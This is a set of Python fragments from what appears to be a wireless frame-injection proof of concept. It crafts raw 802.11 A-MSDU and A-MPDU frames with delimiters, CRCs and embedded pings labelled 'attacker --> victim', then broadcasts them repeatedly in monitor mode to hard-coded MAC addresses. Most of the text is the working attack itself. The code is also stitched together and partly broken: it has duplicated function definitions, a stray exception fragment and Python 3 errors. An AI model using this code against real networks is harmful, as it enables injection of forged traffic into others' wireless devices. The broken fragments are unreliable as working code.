def add_msdu(self, msdu, msdu_len=-1): # Default msdu len if msdu_len == -1: msdu_len = len(msdu) mpdu_len = len(self.dot11hdr) + msdu_len + 4 # mac80211 + msdu + FCS # print the length of the padding print('MPDU length: {mpdu_len}') if mpdu_len % 4 != 0: frame_padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets printd("Padding added: ", Level.INFO) #for character in str(frame_padding): #print "\\x",character.encode('hex'), #does not work in python3 #printd("", Level.INFO) else: frame_padding = "" printd("No padding added", Level.INFO) sys.stdout.flush() mpdu_len <<= 4 crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF) crc = crc_fun(struct.pack('<H', mpdu_len)) maccrc = dot11crc(str(self.dot11hdr / msdu)) # the packet alreacy contains the 'rt' and the 'dot11hdr', so I add the other things self.data = self.data / msdu / maccrc / frame_padding
def main_amsdu(): count = 1 ip_count = 0 count = (count + 1) % 1024 ip_count = (ip_count % 255) + 1 # Ping from attacker --> victim # You need to change the MAC addresses and IPs to match the remote AP amsdu_pkt = AMSDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02) printd(clr(Color.YELLOW, "AMSDU Radiotap (rt):"), Level.INFO) #sys.stdout.flush() #hexdump.hexdump(str(amsdu_pkt.rt)) #for character in str(amsdu_pkt.rt): # this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 " #print "\\x",character.encode('hex'), #does not work in python3 #sys.stdout.flush() print("", Level.INFO) #print a linefeed printd(clr(Color.YELLOW, "AMSDU dot11hdr:"), Level.INFO) #sys.stdout.flush() #hexdump.hexdump(str(amsdu_pkt.dot11hdr)) sys.stdout.flush() # add an MSDU amsdu_pkt.add_msdu( ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))) printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO) #sys.stdout.flush() #hexdump.hexdump(str(amsdu_pkt)) sys.stdout.flush() printd(clr(Color.YELLOW, "AMSDU data:"), Level.INFO) #sys.stdout.flush() #hexdump.hexdump(str(amsdu_pkt.data)) sys.stdout.flush() #for character in str(amsdu_pkt.data): # this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 " #print "\\x",character.encode('hex'), #does not work in python3 #print character, character.encode('hex'), print("", Level.INFO) #print a linefeed # send the packet a number of times for i in range(0, 10): # send the packet amsdu_pkt.send() #the interface has to be in monitor mode printd("AMSDU packet sent", Level.INFO) time.sleep(0.1)
def add_msdu(self, msdu, msdu_len=-1): # Default msdu len if msdu_len == -1: msdu_len = len(msdu) mpdu_len = len(self.dot11hdr) + msdu_len + 4 # mac80211 + msdu + FCS # print the length of the padding #print 'MPDU length: ', mpdu_len #this worked in python2 print('MPDU length: {mpdu_len}') if mpdu_len % 4 != 0: frame_padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets printd("Padding added: ", Level.INFO) #for character in str(frame_padding): #print "\\x",character.encode('hex'), #does not work in python3 #printd("", Level.INFO) else: frame_padding = "" #printd("No padding added", Level.INFO) sys.stdout.flush() mpdu_len <<= 4 crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF) crc = crc_fun(struct.pack('<H', mpdu_len)) maccrc = dot11crc(str(self.dot11hdr / msdu)) delim_sig = 0x4E #print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig)) #hexdump(maccrc) ampdu_header = struct.pack( '<HBB', mpdu_len, crc, delim_sig ) #'pack' returns a string containing the given values, packed according to the given format #hexdump(ampdu_header) self.data = self.data / ampdu_header / self.dot11hdr / msdu / maccrc / frame_padding self.num_subframes += 1
def main(): count = 1 ip_count = 1 # send the packet a number of times for i in range(0, 10): count = (count + 1) % 1024 ip_count = (ip_count % 255) + 1 # Create an empty packet (Radiotap + dot11 header) pkt = Dot11Packet('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B') # dump the radiotap header printd(clr(Color.YELLOW, "Radiotap:"), Level.INFO) hexdump.hexdump(bytes(pkt.rt), result='print') printd("", Level.INFO) #print a linefeed # print the radiotap headerin this format: # "\x00\x00\x12\x00\x2e\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6c\x62\x27\x6c\x5c\x74\x27\xc0\x00\xc0\x01\x00\x00" for my_bytes in bytes(pkt.rt): print(''.join('\\x{:02x}'.format(my_bytes)), end='', flush=True) printd("", Level.INFO) #print a linefeed printd("", Level.INFO) #print a linefeed # print the 802.11 header printd(clr(Color.YELLOW, "802.11 hdr:"), Level.INFO) hexdump.hexdump(bytes(pkt.dot11hdr), result='print') sys.stdout.flush() # add an MSDU to the packet pkt.add_msdu( ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))) printd(clr(Color.YELLOW, "MSDU added:"), Level.INFO) #sys.stdout.flush() #hexdump.hexdump(str(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))) sys.stdout.flush() printd(clr(Color.YELLOW, "Radiotap + 802.11 hdr + MSDU + CRC:"), Level.INFO) #sys.stdout.flush() #hexdump.hexdump(str(pkt.data)) sys.stdout.flush() #for character in str(pkt.data): # this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 " #print "\\x",character.encode('hex'), #does not work in python3 #print character, character.encode('hex'), #print("", Level.INFO) #print a linefeed # send the packet pkt.send() #the interface has to be in monitor mode printd("packet sent", Level.INFO) time.sleep(0.1)
def main_ampdu(): # "Requests" Python library: http://docs.python-requests.org/en/master/user/advanced/ #session = requests.Session() count = 1 ip_count = 0 printd(clr(Color.BLUE, "Building container..."), Level.INFO) """ Build container """ container = '' for i in range(0, 2): count = (count + 1) % 1024 ip_count = (ip_count % 255) + 1 # Ping from attacker --> victim # You need to change the MAC addresses and IPs to match the remote AP ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02) printd(clr(Color.YELLOW, "Radiotap (rt):"), Level.INFO) #sys.stdout.flush() #hexdump.hexdump(str(ampdu_pkt.rt)) #this was valid for python2 #hexdump.hexdump(bytes(ampdu_pkt.rt)) #for character in str(ampdu_pkt.rt): # this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 " #print "\\x",character.encode('hex'), #does not work in python3 #sys.stdout.flush() print("", Level.INFO) #print a linefeed printd(clr(Color.YELLOW, "dot11hdr:"), Level.INFO) #sys.stdout.flush() #hexdump.hexdump(str(ampdu_pkt.dot11hdr)) sys.stdout.flush() # add an MSDU to the AMPDU ampdu_pkt.add_msdu( ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))) printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO) #sys.stdout.flush() #hexdump.hexdump(str(ampdu_pkt)) sys.stdout.flush() ampdu_pkt.add_padding(8) printd( clr(Color.YELLOW, "AMPDU with MSDU and 8 padding delimiters added:"), Level.INFO) #sys.stdout.flush() #hexdump.hexdump(str(ampdu_pkt)) sys.stdout.flush() container += str(ampdu_pkt) # Beacon from attacker --> victim #ampdu_pkt = ssid_packet() #container += str(ampdu_pkt) # Ping from victim --> access point #ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19') #ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count))) #ampdu_pkt.add_padding(8) #container += str(ampdu_pkt) """ end package """ printd(clr(Color.BLUE, "Final A-MPDU built:"), Level.INFO) sys.stdout.flush() #hexdump.hexdump('\x00'*16) #hexdump.hexdump("Hello world") hexdump.hexdump(container) sys.stdout.flush() #for character in container: # this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 " #print "\\x",character.encode('hex'), #does not work in python3 #print character, character.encode('hex'), print("", Level.INFO) #print a linefeed # send the packet a number of times for i in range(0, 10): # send the packet ampdu_pkt.send() #the interface has to be in monitor mode printd("packet sent", Level.INFO) time.sleep(0.1) """
printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL) pass except Exception: printd(clr(Color.RED, "Another exception"), Level.CRITICAL) pass """ if __name__ == "__main__": try: #pocnum = raw_input("option 1: send normal packets. " # this was valid in Python2 # "option 2: send AMSDUs. " # "option 3: send AMPDUs. " # "Choice: ") pocnum = input( "option 1: send normal packets. " # this is valid in Python3 "option 2: send AMSDUs. " "option 3: send AMPDUs. " "Choice: ") if pocnum == "1": main() elif pocnum == "2": main_amsdu() elif pocnum == "3": main_ampdu() else: printd("Invalid PoC number.", Level.CRITICAL) except KeyboardInterrupt: printd("\nExiting...", Level.INFO)
def dump_to_file(self): with open('ampdu.bin', 'w') as f: printd(clr(Color.YELLOW, "Dumped garbage packet"), Level.INFO) f.write(str(self) * 250)